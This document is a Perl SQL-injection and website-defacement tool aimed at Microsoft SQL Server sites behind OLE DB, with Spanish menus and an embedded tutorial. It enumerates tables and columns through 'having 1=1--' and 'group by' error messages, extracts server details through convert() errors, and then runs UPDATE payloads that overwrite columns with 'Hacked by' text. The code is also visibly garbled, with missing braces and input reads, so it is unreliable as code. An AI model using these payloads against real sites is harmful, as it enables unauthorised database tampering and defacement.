# Inj3ct0r SQL Ole DB v.1
use IO::Socket::INET;
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
sub lw
my $SO = $^O;
my $linux = "";
if (index(lc($SO),"win")!=-1){
system ("title Inj3ct0r SQL Ole DB v.1 - By JosS");
system ("color 02");
#*************************** Uso ******************************
if (!$ARGV[0]) {
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Usage: $0 [Host] \n";
print "\n\n";
print "EJ: $0 \n";
#*************************** Menu ******************************
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Menu:\n";
print "\n";
print "1. Comprobar si la web se encuentra 0n\n";
print "2. Injectar codigo manualmente\n";
print "3. Injectar codigo automaticamente\n";
print "4. Informacion del server\n";
print "5. Manual Sql Injection\n";
print "6. Creditos\n";
print "7. Salir\n\n";
print "Opcion:";
if ($opcion!=1 && $opcion!=2 && $opcion!=3 && $opcion!=4 && $opcion!=5 && $opcion!=6 && $opcion!=7)
print "Opciуn Incorrecta\n";
goto menu;
if ($opcion==1)
if ($opcion==2)
if ($opcion==3)
if ($opcion==4)
if ($opcion==5)
if ($opcion==6)
if ($opcion==7)
#*************************** Opcion1 ******************************
sub primero
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
($server) = $host =~ m{http://(.*?)/};
print "Connect To ...: $server\n\n";
$sock = IO::Socket::INET->new(PeerAddr => "$server", PeerPort => 80, Proto => "tcp");
if ($sock)
print "La web esta On\n\n";
print "La web esta 0ff\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion2 ******************************
sub segundo
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Escriba exit en comando si quiere terminar\n\n";
print "Victima: $host\n\n";
print "Comando: ";
chomp $comando;
$comando =~ s/ /+/g;
print "\n\n";
print "Comando injectado: $comando\n\n";
my $final = $host.$comando;
print $final,"\n\n";
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
    if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
        print "MySql dice:  - $1\n\n";
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
    else {
        print "El comando no se ejecuto con exito\n\n";
while ($comando ne 'exit')
print "Escriba exit en comando si quiere terminar\n\n";
print "Victima: $host\n\n";
print "Comando: ";
chomp $comando;
$comando =~ s/ /+/g;
print "\n\n";
print "Comando injectado: $comando\n\n";
my $final = $host.$comando;
print $final,"\n";
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
    if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
        print "MySql dice:  - $1\n\n";
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
    else {
        print "El comando no se ejecuto con exito\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion3 ******************************
sub tercero
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
my @columna;
print "Victima: $host\n\n";
print "Introduce tu Nick: ";
chomp $nick;
@comando=("1 having 1=1--","' having 1=1--","--' having 1=1--");
$comando =~ s/ /+/g;
print "\n\n";
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "\t\t-----Primera Fase-----\n\n\n\n";
print "Comando injectado: $comando[$i]\n\n\n\n";
## Primera Fase ##
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
      ($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
      @comando=("' update $tabla set $columna[0]='<h1>Hacked by $nick'--","1 update $tabla set $columna[0]='<h1>Hacked by $nick'--","--'update $tabla set $columna[0]='<h1>Hacked by $nick'--");
      for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
## Segunda Fase ##
print "\t\t-----Segunda Fase-----\n\n\n\n";
     @comando=("1 group by $columna[0] having 1=1--","' group by $columna[0] having 1=1--","--' group by $columna[0] having 1=1--");
      for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
@comando=("' update $tabla set $columna[1]='<h1>Hacked by $nick'--","1 update $tabla set $columna[1]='<h1>Hacked by $nick'--","--'update $tabla set $columna[1]='<h1>Hacked by $nick'--");
 for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
## Tercera Fase ##
print "\t\t-----Tercera Fase-----\n\n\n\n";
@comando=("1 group by $columna[0],$columna[1] having 1=1--","' group by $columna[0],$columna[1] having 1=1--","--' group by $columna[0],$columna[1] having 1=1--");
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
if ( $doc =~ m/\bColumna?\b(.*?)\<\/font>/mosix ) {
($tabla, $columna) = $doc =~ m/\'(\w+)\.(\w+)\'/simo;
           push @columna, $columna;
       print "tabla: $tabla\n";
       print "Columna: $columna\n\n";
@comando=("' update $tabla set $columna[2]='<h1>Hacked by $nick'--","1 update $tabla set $columna[2]='<h1>Hacked by $nick'--","--'update $tabla set $columna[2]='<h1>Hacked by $nick'--");
for ($i=0;$i<=2;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
print "Comando injectado: $comando[$i]\n\n";
 } #Cierre del If
    else {
        print "El comando no se ejecuto con exito\n\n";
} # Cierre del for principal
print "Pulse la tecla Enter para volver al menu.";
goto menu;
} ##Cierre del sub
#*************************** Opcion4 ******************************
sub cuarto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print "Victima: $host\n\n";
for ($i=0;$i<=3;$i++)
my $final = $host.$comando[$i];
my $ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(GET => $final);
$doc = $ua->request($req)->as_string;
if ( $doc =~ /Syntax\s(.*)<\/font>/mosix )
if ($comando[$i] eq "1+and+1=convert(int,db_name())")
print "db_name:\n";
$dbname = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$dbname\n\n";
if ($comando[$i] eq "1+and+1=convert(int,system_user)")
print "system_user:\n";
$systemuser = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$systemuser\n\n";
if ($comando[$i] eq "1+and+1=convert(int,\@\@servername)--")
print "servername:\n";
$servername = $1 if ($doc =~ /.*value\s'(.*)'\sto.*/);
print "$servername\n\n";
if ($comando[$i] eq '1+and+1=convert(int,@@version)--')
print "version:\n";
$version = $1 if ($doc =~ /.*?value\s'(.*?)'\sto.*/sm);
print "$version\n\n";
} # Cierre del if principal
} # cierre for
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion5 ******************************
sub quinto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
    (Microsoft OLE DB)
Para sacar las tablas y columnas, tenemos que ejecutar este comando:
' having 1=1--
Y como resultado tendremos algo como esto:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.CTe_Titulo' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Bien, pues la tabla y la columna son estas:
Tabla: F_CTexto_1
Columna: CTe_Titulo
A partir de la columna podemos sacar el resto de columnas que se encuentran en la tabla. Mediante este comando:
' group by columna having 1=1--
' group by CTe_Titulo having 1=1--
Y obtenemos:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.IdCTexto' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Entonces ya tenemos otra columna: IdCTexto. Podemos ir sacando mas de esta forma:
' group by Cte_Titulo,IdCTexto having 1=1--
Microsoft OLE DB Provider for SQL Server error '80040e14'
Column 'F_CTexto_1.CTe_Descripcion' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY clause.
/visualizaciones/ctexto.asp, line 17
Y asi sucesivamente vamos consigiendo las columnas. Una vez que tenemos todas las columnas, les hacemos un update para colocar nuestro propio texto y asi defacearla.
' update tabla set columna='HACKED BY JOSS'--
' update F_CTexto_1 set CTe_Descripcion='HACKED BY JOSS'--
Escrito por JosS
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion6 ******************************
sub sexto
print "\t\t########################################################\n\n";
print "\t\t#    Inj3ct0r SQL Ole DB v.1 - Spanish Hackers Team    #\n\n";
print "\t\t#                        by JosS                       #\n\n";
print "\t\t########################################################\n\n";
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$year += 1900;
print "\t\t\t\t$mday/$mon/$year $hour:$min:$sec\n\n";
print " Programador: Jose Luis Gongora Fernandez (JosS)\n\n";
print " Colaboradores: phnx & explorer & kidd \n\n";
print " Greetz To: All Hackers\n\n";
print "Pulse la tecla Enter para volver al menu.";
goto menu;
#*************************** Opcion7 ******************************
sub setimo

